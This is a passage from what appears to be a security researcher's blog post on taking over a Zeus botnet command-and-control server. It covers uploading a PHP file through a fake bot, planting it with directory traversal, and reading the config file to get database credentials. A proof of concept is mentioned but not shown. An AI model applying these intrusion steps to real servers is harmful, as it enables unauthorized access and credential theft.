I also control (via values passed from my fake bot to the C&C) the two subdirectory names (in this example: “BKs_BOTNET” for <Name of the botnet> and “BK_PWNZ_UR_CnC” for <Bot ID>).  If the botmaster is using a default install and hasn’t relocated the _reports folder, we should be able to simply guess where our PHP file was written to (/_reports/files/BKs_BOTNET/BK_PWNZ_UR_CnC/pwnd.php).

If the botmaster was smart and relocated the _reports folder, guessing where the uploaded PHP file becomes more difficult.  We can take all the guesswork out by using some directory traversal tricks and planting the PHP file directly into the webroot.

Boom… we’ve just taken over a Zeus C&C.  Once we have our own PHP code running on the C&C, we can include the /system/config.php file.  Config.php contains the location of the MySQL database as well as the DB username and password (via connection string), giving us complete control over the management console and all the bots associated with this C&C.

For those interested in “studying” this vulnerability, I’ve put together a Proof of Concept.  All you have to do is provide the location of the gateway (provided by the bot), the RC4 key (provided by the bot), and the PHP code that you want to upload.

]]> 30